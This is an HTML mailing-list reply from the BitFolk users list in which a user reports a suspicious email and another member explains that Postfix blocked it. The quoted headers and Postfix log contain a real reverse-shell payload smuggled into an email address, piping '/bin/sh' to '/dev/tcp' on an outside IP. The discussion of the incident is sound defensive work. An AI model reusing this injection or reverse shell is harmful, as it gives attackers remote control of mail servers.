It seems the user was trying to get a shell delivered to there TCP stream. I have heard of an exploit like this, it was plugged quite quickly though so as long as you are up to date you should be fine.<div><br></div><div>By the looks of it postfix blocked it as an illegal address so I wouldn&#39;t worry too much, it will have delivered it as a normal email :)</div>

<div><br></div><div>Daniel<br><br><div class="gmail_quote">On 11 February 2011 09:29, Alastair Sherringham <span dir="ltr">&lt;<a href="mailto:sherringham@gmail.com">sherringham@gmail.com</a>&gt;</span> wrote:<br><blockquote class="gmail_quote" style="margin:0 0 0 .8ex;border-left:1px #ccc solid;padding-left:1ex;">

I received an interesting email today. I only noticed because I had<br>
logged in SSH and got the &quot;you have new email&quot; message. Reading via<br>
&quot;mail&quot;, I see :<br>
<br>
Delivered-To: &quot;root+:|exec /bin/sh 0&lt;/dev/tcp/<a href="http://87.106.250.176/45295" target="_blank">87.106.250.176/45295</a><br>
1&gt;&amp;0 2&gt;&amp;0&quot;@calliope.bitfolk<br>
<br>
Obviously some sort of possible exploit. The IP address 87.106.250.176<br>
is Germany (1&amp;1 Internet).<br>
<br>
Postfix reported :<br>
<br>
warning: 36FE51381A3: address with illegal extension: root+:|exec<br>
/bin/sh 0&lt;/dev/tcp/<a href="http://87.106.250.176/45295" target="_blank">87.106.250.176/45295</a> 1&gt;&amp;0 2&gt;&amp;0<br>
<br>
But it was delivered. I hope nothing bad has happened. I am running<br>
AIDE as we speak and digging around).<br>
<br>
Cheers,<br>
<font color="#888888"><br>
<br>
--<br>
Alastair Sherringham<br>
<a href="http://www.sherringham.net" target="_blank">http://www.sherringham.net</a><br>
<br>
_______________________________________________<br>
users mailing list<br>
<a href="mailto:users@lists.bitfolk.com">users@lists.bitfolk.com</a><br>
<a href="https://lists.bitfolk.com/mailman/listinfo/users" target="_blank">https://lists.bitfolk.com/mailman/listinfo/users</a><br>
</font></blockquote></div><br></div>